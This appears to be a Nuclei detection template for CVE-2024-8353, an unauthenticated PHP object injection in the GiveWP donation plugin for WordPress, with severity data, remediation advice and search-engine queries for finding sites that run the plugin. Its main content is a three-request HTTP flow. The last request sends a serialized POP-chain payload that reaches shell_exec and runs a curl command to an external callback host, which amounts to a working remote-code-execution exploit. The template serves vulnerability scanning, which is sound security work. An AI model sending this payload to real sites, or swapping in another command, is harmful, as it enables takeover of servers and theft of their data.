id: CVE-2024-8353 info: name: GiveWP Donation Plugin <= 3.16.1 - Unauthenticated PHP Object Injection author: hnd3884 severity: critical description: | The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.16.1. This is due to insufficient input validation on user-supplied data. An unauthenticated attacker can inject a serialized PHP object, which may allow them to execute arbitrary PHP code, depending on the presence of a suitable POP chain on the target system. This vulnerability could lead to full site compromise. impact: | Unauthenticated attackers can inject serialized PHP objects to execute arbitrary PHP code through POP chains, potentially achieving full site compromise, complete server control, and access to all WordPress data. remediation: | Update GiveWP plugin to version 3.16.2 or later to address the PHP object injection vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2024-8353 - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/give/givewp-donation-plugin-and-fundraising-platform-3161-unauthenticated-php-object-injection - https://plugins.trac.wordpress.org/browser/give/trunk/readme.txt - https://plugins.trac.wordpress.org/browser/give/tags/3.16.0/includes/process-donation.php#L154 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2024-8353 cwe-id: CWE-502 epss-score: 0.91641 epss-percentile: 0.99692 cpe: cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:* metadata: verified: true vendor: givewp product: givewp framework: wordpress shodan-query: http.html:"/wp-content/plugins/give/" fofa-query: body="/wp-content/plugins/give/" publicwww-query: "/wp-content/plugins/give/" tags: cve,cve2024,wordpress,wp,wp-plugin,givewp,rce,unauth,vkev,vuln variables: cmd: "curl+http://test.{{interactsh-url}}" length: "{{len(cmd)}}" cred: "{{rand_text_alpha(8)}}" flow: http(1) && http(2) && http(3) http: - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded action=give_form_search extractors: - type: json name: id json: - ".[0].id" internal: true - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded action=give_donation_form_nonce&give_form_id={{id}} extractors: - type: json name: nonce json: - ".data" internal: true - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 give-form-id={{id}}&give-form-hash={{nonce}}&give-price-id=0&give-amount=10&give_first={{cred}}&give_last={{cred}}&give_email={{cred}}%40example.org&give_title=%5CO%3A19%3A%22Stripe%5C%5C%5C%5CStripeObject%22%3A1%3A%7Bs%3A10%3A%22%5C0%2A%5C0_values%22%3Ba%3A1%3A%7Bs%3A3%3A%22foo%22%3BO%3A62%3A%22Give%5C%5C%5C%5CPaymentGateways%5C%5C%5C%5CDataTransferObjects%5C%5C%5C%5CGiveInsertPaymentData%22%3A1%3A%7Bs%3A8%3A%22userInfo%22%3Ba%3A1%3A%7Bs%3A7%3A%22address%22%3BO%3A4%3A%22Give%22%3A1%3A%7Bs%3A12%3A%22%5C0%2A%5C0container%22%3BO%3A33%3A%22Give%5C%5C%5C%5CVendors%5C%5C%5C%5CFaker%5C%5C%5C%5CValidGenerator%22%3A3%3A%7Bs%3A12%3A%22%5C0%2A%5C0validator%22%3Bs%3A10%3A%22shell_exec%22%3Bs%3A12%3A%22%5C0%2A%5C0generator%22%3BO%3A34%3A%22Give%5C%5C%5C%5COnboarding%5C%5C%5C%5CSettingsRepository%22%3A1%3A%7Bs%3A11%3A%22%5C0%2A%5C0settings%22%3Ba%3A1%3A%7Bs%3A8%3A%22address1%22%3Bs%3A{{length}}%3A%22{{cmd}}%22%3B%7D%7Ds%3A13%3A%22%5C0%2A%5C0maxRetries%22%3Bi%3A10%3B%7D%7D%7D%7D%7D%7D&give-gateway=offline&action=give_process_donation matchers: - type: dsl dsl: - contains(interactsh_protocol, 'dns') - contains(content_type, "text/html") - status_code == 500 condition: and # digest: 4a0a0047304502210096b8f4dbca236ba4885bce382e641cdf224d89dd0ec9089bc293f39f8d97341002201f06f5cbfdb3ba0a7e0bbfa97370b1ccd122b10bdfaa7bbddcf503b7b8b55669:922c64590222798bb761d5b6d8e72950